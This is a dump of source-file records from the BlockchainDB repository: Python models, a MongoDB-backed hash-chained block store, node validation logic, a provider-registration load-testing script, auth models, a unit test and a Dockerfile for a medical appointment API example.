"eb43a2f732ee5d539c2a5c9e78765daec7a0753a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2133, "license_type": "permissive", "max_line_length": 72, "num_lines": 93, "path": "/example/app/api/common_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Models that are shared between providers, clients and appointments\"\"\"\nfrom typing import List\nimport datetime\nfrom enum import Enum\nfrom pydantic import BaseModel, validator\n\nclass ProvidableTreatment(BaseModel):\n \"\"\"Model for Providable Treatment\"\"\"\n providableTreatmentId: str = str('')\n name: str\n description: str\n\nclass AppointmentStatus(Enum):\n \"\"\"Enum model for an appointment status\"\"\"\n Pending = 0\n Accepted = 1\n Rejected = 2\n Completed = 3\n InProgress = 4\n\nclass Provinces(Enum):\n \"\"\"Enum model for an province\"\"\"\n Ontario = 0\n Manitoba = 1\n Quebec = 2\n Newfoundland = 3\n Saskatchewan = 4\n PrinceEdwardIsland = 5\n BritishColumbia = 6\n NovaScotia = 7\n Yukon = 8\n NorthwestTerritories = 9\n Nunavut = 10\n NewBrunswick = 11\n\n\nclass Name(BaseModel):\n \"\"\"Model for Name\"\"\"\n firstName: str\n middleName: str\n lastName: str\n\n\nclass PhoneNumbers(BaseModel):\n \"\"\"Model for Providable Treatment\"\"\"\n mobile: str\n home: str\n work: str\n\n\nclass Address(BaseModel):\n \"\"\"Model for Address\"\"\"\n addressId: str = str('')\n unit: str\n streetAddress: str\n city: str\n province: Provinces\n country: str\n postalCode: str\n\n @validator('country')\n def country_must_be_canada(cls, value):\n if value.lower() != 'canada':\n raise ValueError(\"Only Canada is supported as a country.\")\n return value\n\n\nclass PrescribedTreatment(ProvidableTreatment):\n treatmentFrequency: str\n startDate: datetime.datetime\n endDate: datetime.datetime\n\n\nclass Notes(BaseModel):\n noteId: str = str('')\n createdDate: datetime.datetime\n note: str\n\n\nclass Appointment(BaseModel):\n \"\"\"Model for Appointment\"\"\"\n appointmentId: str = str('')\n clientId: str\n providerId: str\n reasonForAppointment: str\n address: Address\n date: datetime.datetime\n status: AppointmentStatus = AppointmentStatus.Pending\n attended: bool\n cancellationReason: str = str('')\n requestedTreatments: List[ProvidableTreatment]\n prescribedTreatments: List[PrescribedTreatment] = []\n notes: List[Notes] = []\n" }, { "alpha_fraction": 0.5983520150184631, "alphanum_fraction": 0.6010986566543579, "avg_line_length": 35.407691955566406, "blob_id": "04867aa1726a2991605b73a55ca67022160060bb", "content_id": "6136ac250f0ba4d6db4965d8c1485a3823ae87de", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4733, "license_type": "permissive", "max_line_length": 98, "num_lines": 130, "path": "/example/app/api/blockchain/mongo.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Class to handle mongodb database\"\"\"\n\nimport os\nimport logging\nfrom pymongo import MongoClient\nfrom .models import Block, generate_audit_block\n\n\nclass CreateBlockAlreadyExistsError(Exception):\n def __init__(self, data_key_field_name, data_key_value):\n self.message = f'Block of type CREATE cannot be created. 
\\\n Key: {data_key_field_name} and Id: {data_key_value} already exists'\n\n\nclass MongoDb:\n \"\"\"\n Wrapper for mongodb and performs some basic operations on the database\n \"\"\"\n def __init__(self):\n if 'CONNECTION_STRING' in os.environ:\n self.connection_string = os.environ['CONNECTION_STRING']\n else:\n raise ValueError('CONNECTION_STRING is required as an environment variable')\n\n if 'DATABASE' in os.environ:\n self.database_name = os.environ['DATABASE']\n else:\n raise ValueError('DATABASE is required as an environment variable')\n\n def get_latest_hash(self):\n latest_block = self.__get_database().Blocks.find_one({}, sort=[('_id', -1)])\n\n if latest_block is None:\n return ''\n\n return latest_block['hash']\n\n def commit_block(self, block: Block):\n database = self.__get_database()\n naked_block = block.get_naked_block()\n\n if database.Blocks.count() == 0:\n logging.info(\"Genisys block created\")\n database.Blocks.insert_one(vars(naked_block))\n return\n\n data_block = block.get_data_block()\n data_key_value = str(block.data_key_value)\n\n existing_block_query = {block.data_key_field_name: data_key_value, \"block_type\": 'CREATE'}\n existing_collection_block_result = list(self.__get_database()[data_block.collection]\n .find(filter=existing_block_query))\n\n if len(existing_collection_block_result) > 0 and block.block_type == 'CREATE':\n raise CreateBlockAlreadyExistsError(block.data_key_field_name, data_key_value)\n\n existing_block_query_updated = {\"$set\": {\"superceded\": True}}\n database[data_block.collection].update({block.data_key_field_name: data_key_value},\n existing_block_query_updated, multi=True)\n\n database.Blocks.insert_one(vars(naked_block))\n database[data_block.collection].insert_one(data_block.get_document())\n\n def get_block_count(self):\n database = self.__get_database()\n return database.Blocks.count()\n\n def __get_database(self):\n client = MongoClient(self.connection_string)\n return client[self.database_name]\n\n def __find_base(self, collection_name, query):\n database = self.__get_database()\n\n query['superceded'] = False\n\n return database[collection_name].find(filter=query, projection={'block_type': 0})\n\n def find_one(self, collection_name, query):\n result = self.__find_base(collection_name, query)\n sorted_result = list(result.sort([(\"_id\", -1)]).limit(1))\n\n if len(sorted_result) == 0:\n return None\n\n result = sorted_result[0]\n del result[\"_id\"]\n del result[\"superceded\"]\n\n return self.audit_result(result)\n\n def find(self, collection_name, query):\n results = list(self.__find_base(collection_name, query).sort([(\"_id\", -1)]))\n for result in results:\n del result[\"_id\"]\n del result[\"superceded\"]\n\n return self.audit_results(results)\n\n def audit_result(self, query_result):\n database = self.__get_database()\n\n block = database.Blocks.find_one(filter={\"hash\": query_result['hash_id']})\n\n proposed_hash = generate_audit_block(block['id'], query_result, block['block_type'],\n block['timestamp'], block['previous_hash'])\n\n if proposed_hash.hash == block['hash']:\n return query_result\n return None\n\n def audit_results(self, query_results):\n database = self.__get_database()\n results = []\n\n for result in query_results:\n block = database.Blocks.find_one(filter={\"hash\": result['hash_id']})\n\n proposed_hash = generate_audit_block(block['id'], result, block['block_type'],\n block['timestamp'], block['previous_hash']).hash\n\n if proposed_hash == block['hash']:\n results.append(result)\n\n return results\n\n 
def get_blockchain_hash_links(self):\n block_hash_links = self.__get_database().Blocks.find(sort=[(\"_id\", -1)],\n projection={'hash': 1, 'previous_hash': 1, '_id': 0})\n return {elem['hash']: elem['previous_hash'] for elem in list(block_hash_links)}\n" }, { "alpha_fraction": 0.5930917263031006, "alphanum_fraction": 0.5975402593612671, "avg_line_length": 35.74519348144531, "blob_id": "48eceafa595e785c1dd04fd7ee67146b7b24faeb", "content_id": "cf2bde33c863fb5bcebb7043e52099f4d58cd820", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7643, "license_type": "permissive", "max_line_length": 99, "num_lines": 208, "path": "/src/blockchain/blockchain.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Implementation of the actual blockchain\"\"\"\n\nimport asyncio\nimport json\nimport os\nfrom datetime import datetime, timezone\nimport time\nimport logging\nimport requests\nimport boto3\nfrom injector import inject\nfrom .mongo import MongoDb\nfrom .models import Block, ProposedBlock, generate_block, generate_from_proposed_block\n\n\nclass Blockchain:\n \"\"\"Primary class to control the blockchain\"\"\"\n @inject\n def __init__(self):\n self.database = MongoDb()\n self.nodes = []\n\n if 'ENVIRONMENT' not in os.environ or os.environ['ENVIRONMENT'] == 'local' \\\n or os.environ['ENVIRONMENT'] == 'development':\n if 'NODES' in os.environ and len(os.environ['NODES']) > 0:\n self.nodes = json.loads(os.environ['NODES'])\n else:\n self.nodes = get_aws_nodes()\n\n logging.info(f'Using nodes: {self.nodes}')\n\n count = self.database.get_block_count()\n if count == 0:\n self.__create_genesis_block()\n\n def __create_genesis_block(self):\n \"\"\"Creates the genesys block for the chain. This should only be called once\"\"\"\n self.__commit(Block([], 'GENISYS', '', '', '', '', '', ''))\n\n def commit_transaction(self, transaction, block_type, data_collection_name,\n data_key_field_name, data_key_value):\n \"\"\"Handles the commit for any transaction either create or edit\"\"\"\n retry_count = 3\n count = 0\n\n while count < retry_count:\n new_block = generate_block(transaction, block_type,\n datetime.now(timezone.utc).strftime(\"%Y-%m-%d %H:%M:%S %z\"),\n self.last_block, data_collection_name, data_key_field_name,\n data_key_value)\n\n logging.info(f'New block created with hash: {new_block.hash}')\n is_valid = self.validate_block(new_block)\n\n if is_valid:\n self.__commit(new_block)\n return True\n\n logging.info('Not enough successful results for block. 
Block rejected.')\n count += 1\n time.sleep(0.1 * count)\n return False\n\n def __commit(self, block: Block):\n \"\"\"\n Starts the process to add a block to the blockchain\n \"\"\"\n self.database.commit_block(block)\n return block\n\n def get_proposed_block_hash(self, proposed_block: ProposedBlock):\n \"\"\"\n Generates a block that is potentially to be added to the blockchain\n \"\"\"\n logging.debug(f'proposed: {proposed_block}')\n block = generate_from_proposed_block(proposed_block, self.last_block)\n logging.debug(block)\n return block.hash\n\n def get_new_block_hash(self, transaction, block_type, timestamp, data_collection_name,\n data_key_field_name, data_key_value):\n \"\"\"\n Generates a candidate block and calculates its hash\n \"\"\"\n logging.info(f'Previous hash: {self.last_block}')\n\n new_block = generate_block(transaction, block_type, timestamp,\n self.last_block, data_collection_name,\n data_key_field_name, data_key_value)\n\n logging.info(f'New block: {transaction}, {block_type}, {timestamp},\\\n {data_collection_name}, {data_key_field_name}, {data_key_value}')\n\n return new_block.hash\n\n def validate_block(self, block: Block):\n \"\"\"\n Dispatchs blocks for comparison against other nodes and determines\n the results\n \"\"\"\n if len(self.nodes) == 0:\n return True\n\n proposed_block = ProposedBlock(**vars(block))\n\n logging.info('Starting node conferral process')\n results = asyncio.run(self.validate_with_other_nodes(proposed_block))\n\n logging.info(f'Node conferral results: {results}')\n\n successful_nodes = []\n\n for result in results:\n logging.info(f'status code: {result.status_code} hash: {result.text}')\n logging.debug(f'Current hash: {block.hash} Conferral Node hash: {result.text}')\n\n if result.status_code == 200 and result.text == f'\"{block.hash}\"':\n logging.debug('Adding successful validated node')\n successful_nodes.append(result)\n\n logging.debug(f'Successful Nodes: {len(successful_nodes)}')\n logging.debug(f'All results: {len(results)}')\n logging.debug(f'Rate of success: {(len(successful_nodes) / len(results)) + 0.0}')\n\n return ((len(successful_nodes) / len(results)) + 0.0) > 0.75\n\n async def validate_with_other_nodes(self, proposed_block):\n \"\"\"\n Handles the coallation of the block validation requests\n \"\"\"\n logging.debug(f'Using nodes: {self.nodes}')\n\n outstanding_requests_tasks = [self.validate_with_other_node_request(node, proposed_block)\n for node in self.nodes]\n\n if len(outstanding_requests_tasks) == 0:\n return []\n\n return await asyncio.gather(*outstanding_requests_tasks)\n\n async def validate_with_other_node_request(self, node, proposed_block):\n \"\"\"\n Dispatchs the proposed block for other nodes to confirm the hash is valid\n \"\"\"\n logging.info(f'Attempting to confirm with node at address: \\\n {node}/api/blockchain/validate-block and payload: {proposed_block.json()}')\n\n return requests.post(f'{node}/api/blockchain/validate-block', data=proposed_block.json())\n\n def validate(self):\n \"\"\"\n Validates the blockchain itself to ensure that all nodes are accounted for and in order\n based upon the links from one block to the next. 
Similar to traversal of a linked list.\n \"\"\"\n hash_links = self.database.get_blockchain_hash_links()\n visited = {}\n\n if len(hash_links) == 0:\n return True\n\n list_keys = list(hash_links.keys())\n next_key = hash_links[list_keys[0]]\n visited[list_keys[0]] = True\n hash_links.pop(list_keys[0])\n\n while next_key != '':\n tmp_key = hash_links[next_key]\n hash_links.pop(next_key)\n next_key = tmp_key\n\n if len(hash_links) > 0:\n logging.error('Blockchain failed to validate at: ')\n return False\n\n logging.info(f'Blockchain failed to validate at: {datetime.timestamp()}')\n return True\n\n def find_one(self, collection_name, query):\n \"\"\"\n Wrapper to call to find a single node and its real value in the database\n \"\"\"\n return self.database.find_one(collection_name, query)\n\n def find(self, collection_name, query):\n \"\"\"\n Wrapper to call to find a multiple nodes and their real values in the database\n \"\"\"\n return self.database.find(collection_name, query)\n\n @property\n def last_block(self):\n return self.database.get_latest_hash()\n\n\ndef get_aws_nodes():\n client = boto3.client('servicediscovery')\n metadata_uri = os.environ['ECS_CONTAINER_METADATA_URI']\n container_metadata = requests.get(metadata_uri).json()\n container_ip = container_metadata['Networks'][0]['IPv4Addresses'][0]\n node_ips = []\n for service in client.list_services()['Services']:\n for instance in client.list_instances(\n ServiceId=service['Id'],\n MaxResults=100\n )['Instances']:\n if container_ip != instance['Attributes']['AWS_INSTANCE_IPV4']:\n node_ips.append(instance['Attributes']['AWS_INSTANCE_IPV4'])\n return node_ips\n" }, { "alpha_fraction": 0.7831325531005859, "alphanum_fraction": 0.7831325531005859, "avg_line_length": 26.66666603088379, "blob_id": "3e241a2fdca0aa6b056f050ef99dd72b1c792e74", "content_id": "1bb0abf76d98b2fa0e80eea33663ffdb20e91328", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 249, "license_type": "permissive", "max_line_length": 63, "num_lines": 9, "path": "/example/app/dependencies.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Dependency injection configuration\"\"\"\n\nfrom injector import singleton\nfrom .api.blockchain import BlockchainDb\n\n\ndef configure_dependencies(binder):\n \"\"\"Service configurations\"\"\"\n binder.bind(BlockchainDb, to=BlockchainDb, scope=singleton)\n" }, { "alpha_fraction": 0.6191094517707825, "alphanum_fraction": 0.6359925866127014, "avg_line_length": 26.085426330566406, "blob_id": "df007890c02dc68907515f0fdc04bc97abca8323", "content_id": "9c8e814a0f0ed237d08602e32dc08a9b1cab100f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5390, "license_type": "permissive", "max_line_length": 154, "num_lines": 199, "path": "/example/test/load_testing/provider_mass_adder.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from pydantic import BaseModel, ValidationError, EmailStr, validator\nfrom typing import List\nfrom datetime import datetime\nimport random\nimport asyncio\nimport json\nimport requests\nimport logging\nimport uuid\nfrom enum import Enum\n\n\nclass Provinces(Enum):\n Ontario = 0\n Manitoba = 1\n Quebec = 2\n Newfoundland = 3\n Saskatchewan = 4\n PrinceEdwardIsland = 5\n BritishColumbia = 6\n NovaScotia = 7\n Yukon = 8\n NorthwestTerritories = 9\n Nunavut = 10\n NewBrunswick = 11\n\n\nclass Name(BaseModel):\n firstName: str\n middleName: str\n 
lastName: str\n\n\nclass PhoneNumbers(BaseModel):\n mobile: str\n home: str\n work: str\n\nclass ProvidableTreatment(BaseModel):\n name: str\n description: str\n\nclass Address(BaseModel):\n unit: str\n streetAddress: str\n city: str\n province: Provinces \n country: str\n postalCode: str\n\n @validator('country')\n def country_must_be_canada(cls, v):\n if v.lower() != 'canada':\n raise ValueError(\"Only Canada is supported as a country.\")\n return v\n\n\nclass Appointment(BaseModel):\n appointmentId: str = str(uuid.uuid4())\n clientId: str\n providerId: str\n reasonForAppointment: str\n address: Address\n date: datetime\n status: int \n attended: bool\n cancellationReason: str\n\nclass RegisterProvider(BaseModel):\n username: str\n password: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n dateOfBirth: datetime\n email: EmailStr\n providableTreatments: List[ProvidableTreatment]\n\n\nclass HelperEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, uuid.UUID):\n return str(o)\n \n if isinstance(o, datetime):\n return o.isoformat()\n\n if isinstance(o, Provinces):\n return o.value\n\n return json.JSONEncoder.default(self, o)\n\ndef build_provider():\n name = get_name()\n\n number_of_addresses = random.randint(1, 5)\n number_of_providable_treatments = random.randint(1, 7)\n\n address = []\n providableTreatments = []\n\n for i in range(0, random.randint(1, 7)):\n address.append(get_address())\n\n for i in range(0, random.randint(1, 7)):\n providable_treatment = get_providable_treatments()\n treatment_exists = False\n\n for providableTreatment in providableTreatments:\n if providableTreatment.name == providable_treatment.name:\n treatment_exists = True\n\n if not treatment_exists:\n providableTreatments.append(providable_treatment)\n\n phone_numbers = get_phone_numbers()\n email = get_email(name)\n\n return RegisterProvider(**{\n 'username': email,\n 'password': 'Password!@3',\n 'name': name,\n 'phoneNumbers': phone_numbers,\n 'addresses': address,\n 'dateOfBirth': datetime(1950 + random.randint(0, 40), random.randint(1, 12), random.randint(1, 28)), \n 'providableTreatments':providableTreatments,\n 'email':email\n })\n\ndef get_phone_numbers():\n return PhoneNumbers(**{\n 'mobile': '1234567890',\n 'work': '1234567890',\n 'home': '1234567890'\n })\n\ndef get_email(name: Name):\n return f'{name.firstName}.{name.lastName}@monoper.io'\n\n\ndef get_name():\n first_names = ['john', 'sally', 'kate', 'samina', 'anne', 'will', 'catherine', 'ayla', 'kayla', 'katrina', 'rebecca', 'robert', 'sam', 'eric', 'greg']\n last_names = ['smythe', 'smith', 'johnson', 'wali', 'erikson', 'takamora', 'harper', 'miller', 'jones', 'davis', 'garcia']\n\n first_name = first_names[random.randint(0, len(first_names)-1)]\n middle_name = first_names[random.randint(0, len(first_names)-1)]\n last_name = last_names[random.randint(0, len(last_names)-1)]\n\n return Name(**{'firstName':first_name, 'middleName': middle_name, 'lastName': last_name})\n\n\ndef get_address():\n cities = ['toronto', 'vancouver', 'montreal', 'winnipeg', 'halifax', 'london', 'paris', 'huntsville']\n street_addresses = ['main', 'yonge', 'queen', 'dundas', 'lord', 'red', 'blue', 'ontario', 'durham']\n street_suffixes = ['street', 'avenue', 'boulevard', 'circle']\n\n unit = random.randint(0, 99)\n city = cities[random.randint(0, len(cities)-1)]\n street_address = street_addresses[random.randint(0, len(street_addresses)-1)]\n street_suffix = street_suffixes[random.randint(0, len(street_suffixes)-1)]\n postal_code = 
'l1l1w2'\n\n return Address(**{\n 'unit': unit,\n 'streetAddress': f'{street_address} {street_suffix}',\n 'city': city,\n 'province': random.randint(0, 11),\n 'country': 'canada',\n 'postalCode': postal_code\n })\n\n\ndef get_providable_treatments():\n treatment_names = ['back massage', 'skin cleanse', 'general check up', 'blood testing', 'MRI scan', 'CT scan', 'cancer screening']\n\n treatment_name = treatment_names[random.randint(0, len(treatment_names)-1)]\n\n return ProvidableTreatment(**{\n 'name': treatment_name,\n 'description': treatment_name\n })\n\n\ndef create_provider():\n url = 'https://api.dev.blockmedisolutions.com/api/auth/register-provider'\n print(f'Using url: {url}')\n\n data = build_provider()\n\n json_data = json.dumps(data.dict(), cls=HelperEncoder)\n\n print(json_data)\n print(data.json())\n resp = requests.post(url, data=data.json())\n print(resp)\n print(resp.content)\n\nif __name__ == \"__main__\":\n create_provider()\n" }, { "alpha_fraction": 0.8103448152542114, "alphanum_fraction": 0.8103448152542114, "avg_line_length": 42.5, "blob_id": "b87fbf2fad64d07a23cd188e9d7ad644f78c6194", "content_id": "78b08fef7c595256989263f9a224530128d85156", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "permissive", "max_line_length": 48, "num_lines": 4, "path": "/example/app/api/__init__.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from .provider_routes import api as provider_api\nfrom .client_routes import api as client_api\nfrom .auth_routes import api as auth_api\nfrom .blockchain import blockchain_api\n" }, { "alpha_fraction": 0.7069701552391052, "alphanum_fraction": 0.7339971661567688, "avg_line_length": 27.15999984741211, "blob_id": "893a39aa52165edd752b76c060dd5cc88650d55f", "content_id": "59b90c81fe19839476bb1cdf57cd95b614780559", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 703, "license_type": "permissive", "max_line_length": 150, "num_lines": 25, "path": "/example/Dockerfile", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "FROM tiangolo/uvicorn-gunicorn-fastapi:python3.7\n\nCOPY ./app /app/app\n\nWORKDIR /app/app\n\nRUN pip install --no-cache-dir -r requirements.txt\n\nWORKDIR /\n\nARG CONNECTION_STRING\nARG DATABASE\nARG NODES\nARG USER_POOL_ID\nARG USER_POOL_WEB_CLIENT_ID\n\nENV CONNECTION_STRING=$CONNECTION_STRING\nENV DATABASE=$DATABASE\nENV NODES=$NODES\nENV USER_POOL_ID=$USER_POOL_ID\nENV USER_POOL_WEB_CLIENT_ID=$USER_POOL_WEB_CLIENT_ID\n\nRUN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.crt -days 365 -nodes -subj \"/C=CA/ST=ON/L=TORONTO/O=Blockmedi Solutions/CN=Blockmedi\"\n\nCMD [\"gunicorn\", \"-b\", \"0.0.0.0:443\", \"--keyfile\", \"key.pem\", \"--certfile\", \"cert.crt\", \"-k\", \"uvicorn.workers.UvicornWorker\", \"app.main:app\"]" }, { "alpha_fraction": 0.6465318202972412, "alphanum_fraction": 0.650288999080658, "avg_line_length": 33.599998474121094, "blob_id": "a20a3c3ed4a05a8af1e04958fcfa8138ebcee927", "content_id": "47f4e34465b489a918df0164fcd2b86536d46120", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3460, "license_type": "permissive", "max_line_length": 99, "num_lines": 100, "path": "/example/app/api/blockchain/models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import uuid\nimport json\nimport logging\nfrom hashlib import 
sha256\nfrom datetime import datetime\nfrom pydantic import BaseModel\nfrom ..util import HelperEncoder\n\n\nclass Block:\n def __init__(self, id, data, block_type, timestamp: datetime, previous_hash,\n data_collection_name, data_key_field_name, data_key_value):\n self.id = id\n self.block_type = block_type\n self.timestamp = timestamp\n self.previous_hash = previous_hash\n self.data = json.dumps(data, cls=HelperEncoder)\n\n logging.debug(json.dumps(self.__dict__, sort_keys=True, cls=HelperEncoder))\n\n self.hash = sha256(json.dumps(self.__dict__, sort_keys=True, cls=HelperEncoder).encode()) \\\n .hexdigest()\n self.data_collection_name = data_collection_name\n self.data_key_field_name = data_key_field_name\n self.data_key_value = data_key_value\n self.superceded = False\n\n def get_naked_block(self):\n return NakedBlock(self.id, self.timestamp, self.block_type, self.hash, self.previous_hash)\n\n def get_data_block(self):\n return DataBlock(self.timestamp, self.data_collection_name,\n self.data, self.hash, self.block_type, self.superceded)\n\n\nclass NakedBlock:\n def __init__(self, id, timestamp, block_type, hash, previous_hash):\n self.id = id\n self.block_type = block_type\n self.timestamp = timestamp\n self.previous_hash = previous_hash\n self.hash = hash\n\n\nclass DataBlock:\n def __init__(self, timestamp, data_collection_name, data, hash, block_type, superceded):\n self.timestamp = timestamp\n self.collection = data_collection_name\n self.block_type = block_type\n self.data = data\n self.superceded = superceded\n self.hash = hash\n\n def set_superceded(self):\n self.superceded = True\n\n def get_document(self):\n document = json.loads(self.data)\n document['hash_id'] = self.hash\n document['block_type'] = self.block_type\n document['superceded'] = self.superceded\n return document\n\n\ndef block_types_lookup(block_type):\n block_types = {\"CREATE\": 0, \"GRANT\": 1, \"EDIT\": 2}\n return block_types[block_type]\n\n\ndef block_types_reverse_lookup(block_type):\n print(block_type)\n block_types = {0: \"CREATE\", 1: \"GRANT\", 2: \"EDIT\"}\n return block_types[block_type]\n\n\nclass ProposedBlock(BaseModel):\n id: str\n block_type: str\n timestamp: str\n data: str\n data_collection_name: str\n data_key_field_name: str\n data_key_value: str\n\n\ndef generate_block(data, block_type, timestamp: datetime, previous_hash,\n data_collection_name, data_key_field_name, data_key_value):\n return Block(uuid.uuid4().hex, data, block_type, timestamp, previous_hash,\n data_collection_name, data_key_field_name, data_key_value)\n\ndef generate_audit_block(id, data, block_type, timestamp: datetime, previous_hash):\n del data[\"hash_id\"]\n return Block(id, data, block_type, timestamp, previous_hash, '', '', '')\n\n\ndef generate_from_proposed_block(proposed_block: ProposedBlock, previous_hash):\n return Block(proposed_block.id, json.loads(proposed_block.data),\n proposed_block.block_type, proposed_block.timestamp, previous_hash,\n proposed_block.data_collection_name, proposed_block.data_key_field_name,\n proposed_block.data_key_value)\n" }, { "alpha_fraction": 0.6663001775741577, "alphanum_fraction": 0.6663001775741577, "avg_line_length": 17.190000534057617, "blob_id": "3805c2c54c2fe52b0d0bd41cd1e719d412f5c3cd", "content_id": "24d66bc7f10dd204f25457f95293f037faf61861", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1819, "license_type": "permissive", "max_line_length": 58, "num_lines": 100, "path": "/example/app/api/auth_models.py", 
"repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"\nModels that are used during the authentication process and\nfor adding new clients/providers\n\"\"\"\n\nfrom typing import List\nfrom datetime import datetime\nfrom pydantic import BaseModel, EmailStr\nfrom .common_models import Address, Name, PhoneNumbers\nfrom .provider_models import ProvidableTreatment\n\n\nclass RegisterClient(BaseModel):\n \"\"\"\n Model for client registration\n \"\"\"\n username: str\n password: str\n name: Name\n phoneNumbers: PhoneNumbers\n address: Address\n dateOfBirth: datetime\n email: EmailStr\n\n\nclass RegisterProvider(BaseModel):\n \"\"\"\n Model for provider registration\n \"\"\"\n username: str\n password: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n dateOfBirth: datetime\n email: EmailStr\n providableTreatments: List[ProvidableTreatment]\n\n\nclass SignIn(BaseModel):\n \"\"\"\n Model for sign in\n \"\"\"\n username: str\n password: str\n\n\nclass ConfirmSignUp(BaseModel):\n \"\"\"\n Model for confirming sign up\n \"\"\"\n username: str\n verificationCode: str\n\n\nclass ForgotPassword(BaseModel):\n \"\"\"\n Model for forgot password\n \"\"\"\n username: str\n\n\nclass ConfirmForgotPassword(BaseModel):\n \"\"\"\n Model for confirming a client forgotten password\n \"\"\"\n username: str\n verification_code: str\n new_password: str\n\n\nclass ChangePassword(BaseModel):\n \"\"\"\n Model for changing a password\n \"\"\"\n old_password: str\n new_password: str\n\nclass User(BaseModel):\n \"\"\"\n Model for user\n \"\"\"\n userId: str\n username: str\n usertype: str\n\nclass Token(BaseModel):\n \"\"\"\n Model for auth token\n \"\"\"\n id_token: str\n access_token: str\n refresh_token: str\n\nclass SignInResponse(BaseModel):\n \"\"\"\n Model for sign in response\n \"\"\"\n user: User\n token: Token\n" }, { "alpha_fraction": 0.7802197933197021, "alphanum_fraction": 0.7802197933197021, "avg_line_length": 29.33333396911621, "blob_id": "f245828ae993f4e7afdcdecd4588aa033d8c4d12", "content_id": "dacffc90a7f070aa49f021dd8e98c777ebe47cff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "permissive", "max_line_length": 52, "num_lines": 3, "path": "/example/app/api/blockchain/api/__init__.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Renaming blockchain api export\"\"\"\n\nfrom .blockchain_routes import api as blockchain_api\n" }, { "alpha_fraction": 0.6943867206573486, "alphanum_fraction": 0.6985446810722351, "avg_line_length": 27.352941513061523, "blob_id": "13d8a8aac5102be31ad748d7e4a9dd27a63f13fc", "content_id": "f84320291e63b0b44204191d8c16548be4248f9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "permissive", "max_line_length": 50, "num_lines": 17, "path": "/example/test/test_blockchain.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import unittest\nimport time\nfrom blockchain.blockchain import Blockchain\nfrom blockchain.block import Block\n\nclass testTest(unittest.TestCase):\n def test_genesis_block_created(self):\n blockchain = Blockchain()\n self.assertEqual(len(blockchain.chain), 1)\n\n def test_add_single_block(self):\n blockchain = Blockchain()\n blockchain.addBlock([\"aaa\"])\n self.assertEqual(len(blockchain.chain), 2)\n\n def test(self):\n self.assertTrue(True)" }, { "alpha_fraction": 0.5772076845169067, 
"alphanum_fraction": 0.5801677107810974, "avg_line_length": 30.671875, "blob_id": "ea47faa3ec52fb9a7027a56f6f5bf02f30790610", "content_id": "06caf8c90f3994e0800804d3cb04eadb56aaaf9c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2027, "license_type": "permissive", "max_line_length": 82, "num_lines": 64, "path": "/example/app/api/util.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Utility functions\"\"\"\n\nimport json\nimport uuid\nimport os\nfrom datetime import datetime\nfrom pycognito import Cognito\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security.http import HTTPBearer, HTTPBasicCredentials\nfrom .common_models import AppointmentStatus, Provinces, Appointment, \\\n Address, Name, PhoneNumbers, ProvidableTreatment, \\\n PrescribedTreatment, Notes\nfrom .provider_models import Provider\nfrom .client_models import Client, LinkedProvider\n\nauth = HTTPBearer()\n\nasync def verify_auth_header(authorization: HTTPBasicCredentials = Depends(auth)):\n \"\"\"\n Verifies the credentials sent in the authorisation header with cognito\n \"\"\"\n try:\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'],\n access_token=authorization.credentials)\n if aws_cognito.get_user() is None:\n raise HTTPException(status_code=403)\n\n return authorization.credentials\n except Exception as forbidden:\n raise HTTPException(status_code=403) from forbidden\n\n\nclass HelperEncoder(json.JSONEncoder):\n \"\"\"\n Helper for JSON decoding of classes\n \"\"\"\n def default(self, o):\n if isinstance(o, uuid.UUID):\n return str(o)\n\n if isinstance(o, datetime):\n return o.isoformat()\n\n if isinstance(o, Provinces):\n return o.value\n\n if isinstance(o, AppointmentStatus):\n return o.value\n\n if isinstance(o,\n (Address,\n Appointment,\n Client,\n Name,\n PhoneNumbers,\n ProvidableTreatment,\n Provider,\n LinkedProvider, \n PrescribedTreatment, \n Notes)):\n return o.__dict__\n\n return json.JSONEncoder.default(self, o)\n" } ]
25
BruceJL/mysql-json-bridge
https://github.com/BruceJL/mysql-json-bridge
98aa33fa8da3a0ea0e73fe86531079dc5da0f47d
fedf564bc0ce59c2eb756b51242b3b25d82b016b
